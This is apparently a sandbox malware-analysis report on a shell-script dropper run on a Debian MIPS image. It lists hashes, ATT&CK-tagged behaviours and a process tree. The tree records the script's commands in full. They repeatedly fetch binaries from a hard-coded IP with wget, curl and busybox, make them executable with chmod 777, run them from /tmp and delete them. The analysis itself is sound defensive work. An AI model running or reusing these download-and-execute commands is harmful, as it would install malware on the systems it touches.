Analysis
-
max time kernel
60s -
max time network
62s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
906 rm
907 wget
908 curl
909 busybox
911 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
901 wget
905 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
912 rm
902 curl
903 busybox
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:716
-
/bin/rm/bin/rm bins.sh2⤵PID:719
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:745
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:753
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:760
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:783
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:806
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:822
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:828
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:841
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:863
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:879
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:885
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:891
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:897
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:905
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:911
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:915
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:921
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:927
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:933
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:939
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:945
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:951
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:957
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:963
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:969
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:975
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:981
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:984
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:985
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:987
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:990
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97